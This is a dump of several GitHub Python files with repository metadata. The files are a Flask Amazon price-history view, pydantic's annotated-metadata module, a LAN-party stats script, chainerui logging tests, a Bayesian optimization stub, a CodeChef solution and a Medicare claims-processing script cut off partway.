","repo_name":"pradyutnathradhae/interview_Program","sub_path":"Greedy Algorithms/fastmultiply.py","file_name":"fastmultiply.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24758535200","text":"# -*- coding: utf-8 -*-\n\"\"\"Public section, including homepage and signup.\"\"\"\nimport re\n\nfrom flask import (\n Blueprint,\n current_app,\n flash,\n render_template,\n request,\n send_from_directory,\n)\nfrom flask.helpers import url_for\nfrom werkzeug.utils import redirect\n\nfrom buyhistory.utils import flash_errors\n\nfrom .forms import QueryForm\n\nblueprint = Blueprint(\"public\", __name__, static_folder=\"../static\")\n\n\n@blueprint.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n \"\"\"Home page.\"\"\"\n form = QueryForm()\n current_app.logger.info(\"Hello from the home page!\")\n if request.method == \"POST\":\n if form.validate_on_submit():\n address = form.address.data\n res = re.search(r\"amazon.(\\S{2,6})/\\S{1,4}/(\\w+)\", address)\n try:\n domain = res.group(1)\n asin = res.group(2)\n return redirect(\n url_for(\n \"public.result\", domain=domain, asin=asin, range=form.range.data\n )\n )\n except:\n flash(\"Please check your Amazon address!\", \"danger\")\n else:\n flash_errors(form)\n return render_template(\"public/home.html\", form=form)\n\n\n@blueprint.route(\"/res//\")\ndef result(asin, range=\"90\"):\n form = QueryForm()\n domain = request.args.get(\"domain\", \"com\")\n range = request.args.get(\"range\", \"90\")\n return render_template(\n \"public/results.html\", form=form, domain=domain, asin=asin, range=range\n )\n\n\n@blueprint.route(\"/about/\")\ndef about():\n \"\"\"About page.\"\"\"\n return render_template(\"public/about.html\")\n\n\n@blueprint.route(\"/favicon.ico\")\ndef favicon():\n return send_from_directory(\"./static/build/img\", \"favicon.ico\")\n","repo_name":"weizihua/BuyHistory","sub_path":"buyhistory/public/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17729906913","text":"from __future__ import annotations\n\nfrom collections import defaultdict\nfrom copy import copy\nfrom functools import partial\nfrom typing import TYPE_CHECKING, Any, Callable, Iterable\n\nfrom pydantic_core import CoreSchema, PydanticCustomError, to_jsonable_python\nfrom pydantic_core import core_schema as cs\n\nfrom ._fields import PydanticMetadata\n\nif TYPE_CHECKING:\n from ..annotated_handlers import GetJsonSchemaHandler\n\n\nSTRICT = {'strict'}\nSEQUENCE_CONSTRAINTS = {'min_length', 'max_length'}\nINEQUALITY = {'le', 'ge', 'lt', 'gt'}\nNUMERIC_CONSTRAINTS = {'multiple_of', 'allow_inf_nan', *INEQUALITY}\n\nSTR_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT, 'strip_whitespace', 'to_lower', 'to_upper', 'pattern'}\nBYTES_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\n\nLIST_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\nTUPLE_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\nSET_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\nDICT_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\nGENERATOR_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\n\nFLOAT_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nINT_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nBOOL_CONSTRAINTS = STRICT\nUUID_CONSTRAINTS = STRICT\n\nDATE_TIME_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nTIMEDELTA_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nTIME_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nLAX_OR_STRICT_CONSTRAINTS = STRICT\n\nUNION_CONSTRAINTS = {'union_mode'}\nURL_CONSTRAINTS = {\n 'max_length',\n 'allowed_schemes',\n 'host_required',\n 'default_host',\n 'default_port',\n 'default_path',\n}\n\nTEXT_SCHEMA_TYPES = ('str', 'bytes', 'url', 'multi-host-url')\nSEQUENCE_SCHEMA_TYPES = ('list', 'tuple', 'set', 'frozenset', 'generator', *TEXT_SCHEMA_TYPES)\nNUMERIC_SCHEMA_TYPES = ('float', 'int', 'date', 'time', 'timedelta', 'datetime')\n\nCONSTRAINTS_TO_ALLOWED_SCHEMAS: dict[str, set[str]] = defaultdict(set)\nfor constraint in STR_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(TEXT_SCHEMA_TYPES)\nfor constraint in BYTES_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('bytes',))\nfor constraint in LIST_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('list',))\nfor constraint in TUPLE_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('tuple',))\nfor constraint in SET_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('set', 'frozenset'))\nfor constraint in DICT_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('dict',))\nfor constraint in GENERATOR_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('generator',))\nfor constraint in FLOAT_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('float',))\nfor constraint in INT_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('int',))\nfor constraint in DATE_TIME_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('date', 'time', 'datetime'))\nfor constraint in TIMEDELTA_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('timedelta',))\nfor constraint in TIME_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('time',))\nfor schema_type in (*TEXT_SCHEMA_TYPES, *SEQUENCE_SCHEMA_TYPES, *NUMERIC_SCHEMA_TYPES, 'typed-dict', 'model'):\n CONSTRAINTS_TO_ALLOWED_SCHEMAS['strict'].add(schema_type)\nfor constraint in UNION_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('union',))\nfor constraint in URL_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('url', 'multi-host-url'))\nfor constraint in BOOL_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('bool',))\nfor constraint in UUID_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('uuid',))\nfor constraint in LAX_OR_STRICT_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('lax-or-strict',))\n\n\ndef add_js_update_schema(s: cs.CoreSchema, f: Callable[[], dict[str, Any]]) -> None:\n def update_js_schema(s: cs.CoreSchema, handler: GetJsonSchemaHandler) -> dict[str, Any]:\n js_schema = handler(s)\n js_schema.update(f())\n return js_schema\n\n if 'metadata' in s:\n metadata = s['metadata']\n if 'pydantic_js_functions' in s:\n metadata['pydantic_js_functions'].append(update_js_schema)\n else:\n metadata['pydantic_js_functions'] = [update_js_schema]\n else:\n s['metadata'] = {'pydantic_js_functions': [update_js_schema]}\n\n\ndef as_jsonable_value(v: Any) -> Any:\n if type(v) not in (int, str, float, bytes, bool, type(None)):\n return to_jsonable_python(v)\n return v\n\n\ndef expand_grouped_metadata(annotations: Iterable[Any]) -> Iterable[Any]:\n \"\"\"Expand the annotations.\n\n Args:\n annotations: An iterable of annotations.\n\n Returns:\n An iterable of expanded annotations.\n\n Example:\n ```py\n from annotated_types import Ge, Len\n\n from pydantic._internal._known_annotated_metadata import expand_grouped_metadata\n\n print(list(expand_grouped_metadata([Ge(4), Len(5)])))\n #> [Ge(ge=4), MinLen(min_length=5)]\n ```\n \"\"\"\n import annotated_types as at\n\n from pydantic.fields import FieldInfo # circular import\n\n for annotation in annotations:\n if isinstance(annotation, at.GroupedMetadata):\n yield from annotation\n elif isinstance(annotation, FieldInfo):\n yield from annotation.metadata\n # this is a bit problematic in that it results in duplicate metadata\n # all of our \"consumers\" can handle it, but it is not ideal\n # we probably should split up FieldInfo into:\n # - annotated types metadata\n # - individual metadata known only to Pydantic\n annotation = copy(annotation)\n annotation.metadata = []\n yield annotation\n else:\n yield annotation\n\n\ndef apply_known_metadata(annotation: Any, schema: CoreSchema) -> CoreSchema | None: # noqa: C901\n \"\"\"Apply `annotation` to `schema` if it is an annotation we know about (Gt, Le, etc.).\n Otherwise return `None`.\n\n This does not handle all known annotations. If / when it does, it can always\n return a CoreSchema and return the unmodified schema if the annotation should be ignored.\n\n Assumes that GroupedMetadata has already been expanded via `expand_grouped_metadata`.\n\n Args:\n annotation: The annotation.\n schema: The schema.\n\n Returns:\n An updated schema with annotation if it is an annotation we know about, `None` otherwise.\n\n Raises:\n PydanticCustomError: If `Predicate` fails.\n \"\"\"\n import annotated_types as at\n\n from . import _validators\n\n schema = schema.copy()\n schema_update, other_metadata = collect_known_metadata([annotation])\n schema_type = schema['type']\n for constraint, value in schema_update.items():\n if constraint not in CONSTRAINTS_TO_ALLOWED_SCHEMAS:\n raise ValueError(f'Unknown constraint {constraint}')\n allowed_schemas = CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint]\n\n if schema_type in allowed_schemas:\n if constraint == 'union_mode' and schema_type == 'union':\n schema['mode'] = value # type: ignore # schema is UnionSchema\n else:\n schema[constraint] = value\n continue\n\n if constraint == 'allow_inf_nan' and value is False:\n return cs.no_info_after_validator_function(\n _validators.forbid_inf_nan_check,\n schema,\n )\n elif constraint == 'pattern':\n # insert a str schema to make sure the regex engine matches\n return cs.chain_schema(\n [\n schema,\n cs.str_schema(pattern=value),\n ]\n )\n elif constraint == 'gt':\n s = cs.no_info_after_validator_function(\n partial(_validators.greater_than_validator, gt=value),\n schema,\n )\n add_js_update_schema(s, lambda: {'gt': as_jsonable_value(value)})\n return s\n elif constraint == 'ge':\n return cs.no_info_after_validator_function(\n partial(_validators.greater_than_or_equal_validator, ge=value),\n schema,\n )\n elif constraint == 'lt':\n return cs.no_info_after_validator_function(\n partial(_validators.less_than_validator, lt=value),\n schema,\n )\n elif constraint == 'le':\n return cs.no_info_after_validator_function(\n partial(_validators.less_than_or_equal_validator, le=value),\n schema,\n )\n elif constraint == 'multiple_of':\n return cs.no_info_after_validator_function(\n partial(_validators.multiple_of_validator, multiple_of=value),\n schema,\n )\n elif constraint == 'min_length':\n s = cs.no_info_after_validator_function(\n partial(_validators.min_length_validator, min_length=value),\n schema,\n )\n add_js_update_schema(s, lambda: {'minLength': (as_jsonable_value(value))})\n return s\n elif constraint == 'max_length':\n s = cs.no_info_after_validator_function(\n partial(_validators.max_length_validator, max_length=value),\n schema,\n )\n add_js_update_schema(s, lambda: {'maxLength': (as_jsonable_value(value))})\n return s\n elif constraint == 'strip_whitespace':\n return cs.chain_schema(\n [\n schema,\n cs.str_schema(strip_whitespace=True),\n ]\n )\n elif constraint == 'to_lower':\n return cs.chain_schema(\n [\n schema,\n cs.str_schema(to_lower=True),\n ]\n )\n elif constraint == 'to_upper':\n return cs.chain_schema(\n [\n schema,\n cs.str_schema(to_upper=True),\n ]\n )\n elif constraint == 'min_length':\n return cs.no_info_after_validator_function(\n partial(_validators.min_length_validator, min_length=annotation.min_length),\n schema,\n )\n elif constraint == 'max_length':\n return cs.no_info_after_validator_function(\n partial(_validators.max_length_validator, max_length=annotation.max_length),\n schema,\n )\n else:\n raise RuntimeError(f'Unable to apply constraint {constraint} to schema {schema_type}')\n\n for annotation in other_metadata:\n if isinstance(annotation, at.Gt):\n return cs.no_info_after_validator_function(\n partial(_validators.greater_than_validator, gt=annotation.gt),\n schema,\n )\n elif isinstance(annotation, at.Ge):\n return cs.no_info_after_validator_function(\n partial(_validators.greater_than_or_equal_validator, ge=annotation.ge),\n schema,\n )\n elif isinstance(annotation, at.Lt):\n return cs.no_info_after_validator_function(\n partial(_validators.less_than_validator, lt=annotation.lt),\n schema,\n )\n elif isinstance(annotation, at.Le):\n return cs.no_info_after_validator_function(\n partial(_validators.less_than_or_equal_validator, le=annotation.le),\n schema,\n )\n elif isinstance(annotation, at.MultipleOf):\n return cs.no_info_after_validator_function(\n partial(_validators.multiple_of_validator, multiple_of=annotation.multiple_of),\n schema,\n )\n elif isinstance(annotation, at.MinLen):\n return cs.no_info_after_validator_function(\n partial(_validators.min_length_validator, min_length=annotation.min_length),\n schema,\n )\n elif isinstance(annotation, at.MaxLen):\n return cs.no_info_after_validator_function(\n partial(_validators.max_length_validator, max_length=annotation.max_length),\n schema,\n )\n elif isinstance(annotation, at.Predicate):\n predicate_name = f'{annotation.func.__qualname__} ' if hasattr(annotation.func, '__qualname__') else ''\n\n def val_func(v: Any) -> Any:\n # annotation.func may also raise an exception, let it pass through\n if not annotation.func(v):\n raise PydanticCustomError(\n 'predicate_failed',\n f'Predicate {predicate_name}failed', # type: ignore\n )\n return v\n\n return cs.no_info_after_validator_function(val_func, schema)\n # ignore any other unknown metadata\n return None\n\n return schema\n\n\ndef collect_known_metadata(annotations: Iterable[Any]) -> tuple[dict[str, Any], list[Any]]:\n \"\"\"Split `annotations` into known metadata and unknown annotations.\n\n Args:\n annotations: An iterable of annotations.\n\n Returns:\n A tuple contains a dict of known metadata and a list of unknown annotations.\n\n Example:\n ```py\n from annotated_types import Gt, Len\n\n from pydantic._internal._known_annotated_metadata import collect_known_metadata\n\n print(collect_known_metadata([Gt(1), Len(42), ...]))\n #> ({'gt': 1, 'min_length': 42}, [Ellipsis])\n ```\n \"\"\"\n import annotated_types as at\n\n annotations = expand_grouped_metadata(annotations)\n\n res: dict[str, Any] = {}\n remaining: list[Any] = []\n for annotation in annotations:\n # isinstance(annotation, PydanticMetadata) also covers ._fields:_PydanticGeneralMetadata\n if isinstance(annotation, PydanticMetadata):\n res.update(annotation.__dict__)\n # we don't use dataclasses.asdict because that recursively calls asdict on the field values\n elif isinstance(annotation, at.MinLen):\n res.update({'min_length': annotation.min_length})\n elif isinstance(annotation, at.MaxLen):\n res.update({'max_length': annotation.max_length})\n elif isinstance(annotation, at.Gt):\n res.update({'gt': annotation.gt})\n elif isinstance(annotation, at.Ge):\n res.update({'ge': annotation.ge})\n elif isinstance(annotation, at.Lt):\n res.update({'lt': annotation.lt})\n elif isinstance(annotation, at.Le):\n res.update({'le': annotation.le})\n elif isinstance(annotation, at.MultipleOf):\n res.update({'multiple_of': annotation.multiple_of})\n elif isinstance(annotation, type) and issubclass(annotation, PydanticMetadata):\n # also support PydanticMetadata classes being used without initialisation,\n # e.g. `Annotated[int, Strict]` as well as `Annotated[int, Strict()]`\n res.update({k: v for k, v in vars(annotation).items() if not k.startswith('_')})\n else:\n remaining.append(annotation)\n # Nones can sneak in but pydantic-core will reject them\n # it'd be nice to clean things up so we don't put in None (we probably don't _need_ to, it was just easier)\n # but this is simple enough to kick that can down the road\n res = {k: v for k, v in res.items() if v is not None}\n return res, remaining\n\n\ndef check_metadata(metadata: dict[str, Any], allowed: Iterable[str], source_type: Any) -> None:\n \"\"\"A small utility function to validate that the given metadata can be applied to the target.\n More than saving lines of code, this gives us a consistent error message for all of our internal implementations.\n\n Args:\n metadata: A dict of metadata.\n allowed: An iterable of allowed metadata.\n source_type: The source type.\n\n Raises:\n TypeError: If there is metadatas that can't be applied on source type.\n \"\"\"\n unknown = metadata.keys() - set(allowed)\n if unknown:\n raise TypeError(\n f'The following constraints cannot be applied to {source_type!r}: {\", \".join([f\"{k!r}\" for k in unknown])}'\n )\n","repo_name":"pydantic/pydantic","sub_path":"pydantic/_internal/_known_annotated_metadata.py","file_name":"_known_annotated_metadata.py","file_ext":"py","file_size_in_byte":16415,"program_lang":"python","lang":"en","doc_type":"code","stars":16514,"dataset":"github-code","pt":"48"} +{"seq_id":"15440278445","text":"from datetime import datetime\n\nTESTING = False\n\nclass LANInfo:\n def __init__(self, start_time, end_time, participants, guild_id):\n self.start_time = start_time\n self.end_time = end_time\n self.participants = participants\n self.guild_id = guild_id\n\nif not TESTING:\n LAN_PARTIES = {\n \"october_21\": LANInfo(\n datetime(2021, 10, 30, 14, 0, 0).timestamp(),\n datetime(2021, 10, 31, 12, 0, 0).timestamp(),\n {\n 115142485579137029: \"Dave\",\n 172757468814770176: \"Murt\",\n 267401734513491969: \"Gual\",\n 331082926475182081: \"Muds\",\n 347489125877809155: \"Nønø\"\n },\n 803987403932172359 # Core Nibs\n ),\n \"april_22\": LANInfo(\n datetime(2022, 4, 15, 14, 0, 0).timestamp(),\n datetime(2022, 4, 16, 12, 0, 0).timestamp(),\n {\n 115142485579137029: \"Dave\",\n 172757468814770176: \"Murt\",\n 267401734513491969: \"Gual\",\n 331082926475182081: \"Muds\",\n 347489125877809155: \"Nønø\"\n },\n 803987403932172359 # Core Nibs\n ),\n \"september_23\": LANInfo(\n datetime(2023, 9, 9, 14, 0, 0).timestamp(),\n datetime(2023, 9, 10, 12, 0, 0).timestamp(),\n {\n 115142485579137029: \"Dave\",\n 172757468814770176: \"Murt\",\n 267401734513491969: \"Gual\",\n 331082926475182081: \"Muds\",\n 347489125877809155: \"Nønø\"\n },\n 803987403932172359 # Core Nibs\n )\n }\nelse: # Use old data for testing.\n LAN_PARTIES = {\n \"april_22\": LANInfo(\n 1631470327,\n 1631655446,\n {\n 115142485579137029: \"Dave\",\n 172757468814770176: \"Murt\",\n 267401734513491969: \"Gual\",\n 331082926475182081: \"Muds\",\n 347489125877809155: \"Nønø\"\n },\n 619073595561213953 # League Nibs\n )\n }\n\ndef is_lan_ongoing(timestamp, guild_id=None):\n lan_date = list(filter(\n lambda x: timestamp > LAN_PARTIES[x].start_time and timestamp < LAN_PARTIES[x].end_time,\n LAN_PARTIES\n ))\n\n if lan_date == []:\n return False\n\n latest_lan_info = LAN_PARTIES[lan_date[0]]\n\n # Check if guild_id matches, if given.\n return guild_id is None or guild_id == latest_lan_info.guild_id\n\ndef get_tilt_value(recent_games):\n # Tilt value ranges from 0-12\n tilt_value = 0\n max_value = 12\n max_contribution = 4\n min_contribution = 1\n win_contribution = 0.75\n prev_result = 0\n streak = 1\n for index, result in enumerate(recent_games):\n tilt_contribution = max(max_contribution - index, min_contribution)\n if index > 0:\n if prev_result == result:\n streak += 1\n else:\n streak = 1\n\n tilt_contribution *= (streak // 2)\n\n if result == 1:\n tilt_contribution *= -win_contribution\n\n tilt_value += tilt_contribution\n\n prev_result = result\n\n # Clamp value to between 0-12\n tilt_value = max(min(tilt_value, max_value), 0)\n\n colors = [\n \"rgb(124, 252, 0)\", \"rgb(156, 252, 0)\", \"rgb(188, 253, 0)\",\n \"rgb(220, 253, 0)\", \"rgb(252, 253, 0)\", \"rgb(252, 223, 0)\",\n \"rgb(253, 191, 0)\", \"rgb(254, 159, 0)\", \"rgb(254, 128, 0)\",\n \"rgb(254, 96, 0)\", \"rgb(254, 64, 0)\", \"rgb(255, 0, 0)\"\n ]\n color = colors[min(round(tilt_value), 11)]\n\n # Convert to percent.\n return int((tilt_value / max_value) * 100), color\n\ndef get_average_stats(database, lan_info):\n all_stats = database.get_league_lan_stats(\n time_after=lan_info.start_time,\n time_before=lan_info.end_time,\n guild_id=lan_info.guild_id\n )\n\n if all_stats == []:\n return None, None\n\n keys = [\n \"Kills\", \"Deaths\", \"KDA\", \"CS\", \"CS/min\", \"Damage\",\n \"Gold\", \"KP\", \"Vision Wards\", \"Vision Score\"\n ]\n\n all_avg_stats = {key: [] for key in keys}\n for disc_id in all_stats:\n avg_stats = [0 for _ in keys]\n total_kda = 0\n\n for stat_tuple in all_stats[disc_id]:\n total_kda += (stat_tuple[0] + stat_tuple[2]) / stat_tuple[1]\n for index, stat_value in enumerate(stat_tuple):\n avg_stats[index] += stat_value\n avg_stats[2] = total_kda\n\n for index, sum_value in enumerate(avg_stats):\n all_avg_stats[keys[index]].append((disc_id, sum_value / len(all_stats[disc_id])))\n\n for key in all_avg_stats:\n reverse = False if key == \"Deaths\" else True\n all_avg_stats[key].sort(key=lambda x: x[1], reverse=reverse)\n\n all_ranks = {}\n\n for stat_name in all_avg_stats:\n stats = all_avg_stats[stat_name]\n\n for index, (disc_id, _) in enumerate(stats):\n all_ranks[disc_id] = all_ranks.get(disc_id, 0) + (index + 1)\n\n all_ranks_list = [(k, v) for k, v in all_ranks.items()]\n all_ranks_list.sort(key=lambda x: x[1])\n\n return all_avg_stats, all_ranks_list\n","repo_name":"mhso/IntFar","sub_path":"api/lan.py","file_name":"lan.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"27137743302","text":"from chainerui.logging import _get_library_logger\nfrom chainerui.logging import get_logger\n\n\ndef test_get_logger_with_pytest_default(caplog):\n # On flask 0.12.x, when remove flask's handler, local handler is also\n # no effect (not known exactly why?). Need to set caplog handler again.\n _get_library_logger().addHandler(caplog.handler)\n # caplog has already set on start unittest module\n import logging\n assert logging.getLogger().handlers\n\n # other test suite has already called chainerui.logger, so need to reset\n # library logger\n import chainerui.logging as logging_util\n logging_util._logger = None\n logger = get_logger()\n\n # When added caplog handler manually, caplog captures logging 2 times,\n # on root logger and on local logger. To prevent from this issue,\n # remove root handler manually after get local logger.\n root_logger = logging.getLogger()\n if root_logger.handlers:\n for handler in root_logger.handlers[:]:\n root_logger.removeHandler(handler)\n\n logger.error('error')\n logger.info('info')\n logger.debug('debug')\n\n assert len(caplog.records) == 2\n assert 'event' in caplog.records[0].message\n assert \"error\" in caplog.records[0].message\n assert 'event' in caplog.records[1].message\n assert 'info' in caplog.records[1].message\n\n logging_util.set_loglevel(logging.DEBUG)\n logger2 = get_logger()\n logger2.debug('debug')\n assert len(caplog.records) == 3\n assert 'event' in caplog.records[2].message\n assert 'debug' in caplog.records[2].message\n\n\ndef test_get_logger_with_own_handler(capsys):\n # reset pytest logging capture\n import logging\n root_logger = logging.getLogger()\n if root_logger.handlers:\n for handler in root_logger.handlers[:]:\n root_logger.removeHandler(handler)\n\n # other test suite has already called chainerui.logger, so need to reset\n # library logger\n import chainerui.logging as logging_util\n logging_util._logger = None\n logger = get_logger()\n\n logger.error('error')\n logger.info('info')\n logger.debug('debug')\n\n _, err = capsys.readouterr()\n assert 'event' not in err\n assert 'error' in err\n assert 'info' in err\n assert 'debug' not in err\n\n logging_util.set_loglevel(logging.DEBUG)\n logger.debug('debug')\n _, err2 = capsys.readouterr()\n assert 'debug' in err2\n","repo_name":"chainer/chainerui","sub_path":"tests/test_logging.py","file_name":"test_logging.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"48"} +{"seq_id":"2985616028","text":"#!/usr/bin/env python3\n\n\n\"\"\"useless comment\"\"\"\n\nimport numpy as np\n\nGP = __import__('2-gp').GaussianProcess\n\n\nclass BayesianOptimization:\n \"\"\"\n Bayesian Optimization Class\n \"\"\"\n\n def __init__(\n self,\n f,\n X_init,\n Y_init,\n bounds,\n ac_samples,\n l=1,\n sigma_f=1,\n xsi=0.01,\n minimize=True,\n ):\n \"\"\"\n Init the class\n :param f: The blakc-box function\n :param X_init: The dataset inital\n :param Y_init: The value of the initial\n dataset after being process by f\n :param bounds: The bounds of the space in\n which to look for the optimal point\n :param ac_samples: The number of samples\n that should by analyzed during acquisition\n :param l: The length parameter for the kernel\n :param sigma_f: The std given to the output\n of the black_box function f\n :param xsi: The exploration-exploitation factor\n for acquisition\n :param minimize: Determining whether optimization should\n be performed for minimization or maximization\n \"\"\"\n self.f = f\n self.gp = GP(X_init, Y_init, l=l, sigma_f=sigma_f)\n self.X_s = np.linspace(\n bounds[0],\n bounds[1],\n ac_samples\n ).reshape((-1, 1))\n self.xsi = xsi\n self.minimize = minimize\n","repo_name":"Camaltra/holbertonschool-machine_learning","sub_path":"unsupervised_learning/hyperparameter_tuning/3-bayes_opt.py","file_name":"3-bayes_opt.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8691065755","text":"# cook your dish here\nfor t in range(int(input())):\n S=input()\n max_pairs=0\n prev=True\n for i in range(1,len(S)):\n if(S[i]!=S[i-1] and prev):\n prev=False\n max_pairs+=1\n else:\n prev=True\n print(max_pairs) ","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"XYSTR.py","file_name":"XYSTR.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"22395537064","text":"## THIS SCRIPT IDENTIFY UTI/PNEUMONIA IN SNF CLAIMS FROM MEDPAR\n\nimport pandas as pd\nimport dask.dataframe as dd\nimport dask\nimport numpy as np\nimport datetime\n\npd.set_option('display.max_columns', 500)\nfrom dask.distributed import Client\nclient = Client(\"10.50.86.250:56321\")\n\ndef identify_uti_claims(row):\n ## a function to identify UTI claims using diagnosis code\n ## define diagnosis code columns\n dcode = ['DGNS_{}_CD'.format(i) for i in list(range(1, 26))]\n\n uti_claims = row[dcode[2:]].isin(icd[icd['outcome']==\"uti\"]['icd']) ##determines if diagnosis code is related to uti\n\n if (any(row['DGNS_1_CD']==code for code in icd[icd['outcome'] == \"uti\"]['icd'])):\n row['claim_typeUTI'] = 'primary' ## if the first diagnosis code is related to UTI\n elif (any(row['DGNS_2_CD']==code for code in icd[icd['outcome'] == \"uti\"]['icd'])):\n row['claim_typeUTI'] = 'second' ## if the second diagnosis code is related to UTI\n elif any(uti_claims):\n row['claim_typeUTI'] = 'secondary' ## if any remaining secondary diagnosis code is related to UTI\n else:\n row['claim_typeUTI'] = 'not_uti'\n return row\n\ndef identify_pneu_claims(row):\n ## a function to identify pneumonia claims using diagnosis code\n ## define diagnosis code columns\n dcode = ['DGNS_{}_CD'.format(i) for i in list(range(1, 26))]\n\n pneumonia_claims = row[dcode[2:]].isin(icd[icd['outcome']==\"pneumonia\"]['icd']) ##determines if diagnosis code is related to pneumonia\n\n if (any(row['DGNS_1_CD']==code for code in icd[icd['outcome'] == \"pneumonia\"]['icd'])):\n row['claim_typePNEU'] = 'primary'\n elif (any(row['DGNS_2_CD']==code for code in icd[icd['outcome'] == \"pneumonia\"]['icd'])):\n row['claim_typePNEU'] = 'second'\n elif any(pneumonia_claims):\n row['claim_typePNEU'] = 'secondary'\n else:\n row['claim_typePNEU'] = 'not_pneumonia'\n\n return row\n\n\nyears = range(2011, 2018)\nclaims_type = [\"primary\", \"second\", \"secondary\"]\n\nmedparPath = \"/gpfs/data/cms-share/data/medicare/{}/medpar/parquet\"\nwritePath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/medpar/infection/constructed_data2/'\nanalysisPath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/medpar/infection/initial_analysis/'\n# ## read in icd codes for UTI and Pneumonia\nicd = pd.read_csv('/gpfs/data/cms-share/duas/55378/Zoey/gardner/gitlab_code/nhc_infections/code/initial_analysis/icd.csv')\nicd = icd.astype({'icd': 'str'})\n\nfor year in years:\n\n ## define diagnosis columns\n dcode = ['DGNS_{}_CD'.format(i) for i in list(range(1, 26))]\n ## define poa indicator columns (not used)\n poacode = ['POA_DGNS_{}_IND_CD'.format(i) for i in list(range(1, 26))]\n ## define diagnosis version columns\n dvcode = ['DGNS_VRSN_CD_{}'.format(i) for i in list(range(1, 26))]\n ## define columns selected for the analysis\n col_use = ['BENE_ID', 'MEDPAR_ID', 'MEDPAR_YR_NUM', 'PRVDR_NUM', 'ADMSN_DT', 'DSCHRG_DT',\n 'DSCHRG_DSTNTN_CD', 'SS_LS_SNF_IND_CD', 'BENE_DSCHRG_STUS_CD', 'DRG_CD',\n 'ADMTG_DGNS_CD', 'CVRD_LVL_CARE_THRU_DT'] + dcode + poacode + dvcode\n\n ## read in raw MedPAR data\n medpar = dd.read_parquet(medparPath.format(year), engine=\"fastparquet\")\n medpar = medpar.reset_index()\n\n ## select columns and rows\n ## 1) select inpatient data\n ## 2) select columns\n ## 3) select pu related claims\n\n ## 1) select SNF claims\n snf = medpar[medpar.SS_LS_SNF_IND_CD == 'N']\n ## 2) select columns\n snf = snf[col_use]\n ## apply the function to identify UTI SNF claims\n snf_uti = snf.map_partitions(lambda ddf: ddf.apply(identify_uti_claims, axis=1))\n\n snf_uti[snf_uti['claim_typeUTI'] == \"primary\"].repartition(npartitions=20).to_parquet(\n writePath + 'SNFprimaryUTI/{}/'.format(year)\n )\n snf_uti[snf_uti['claim_typeUTI'] == \"second\"].repartition(npartitions=20).to_parquet(\n writePath + 'SNFsecondUTI/{}/'.format(year)\n )\n snf_uti[snf_uti['claim_typeUTI'] == \"secondary\"].repartition(npartitions=40).to_parquet(\n writePath + 'SNFsecondaryUTI/{}/'.format(year)\n )\n ## apply the function to identify pneumonia SNF claims\n snf_pneu = snf.map_partitions(lambda ddf: ddf.apply(identify_pneu_claims, axis=1))\n\n snf_pneu[snf_pneu['claim_typePNEU'] == \"primary\"].repartition(npartitions=20).to_parquet(\n writePath + 'SNFprimaryPNEU/{}/'.format(year)\n )\n snf_pneu[snf_pneu['claim_typePNEU'] == \"second\"].repartition(npartitions=20).to_parquet(\n writePath + 'SNFsecondPNEU/{}/'.format(year)\n )\n snf_pneu[snf_pneu['claim_typePNEU'] == \"secondary\"].repartition(npartitions=40).to_parquet(\n writePath + 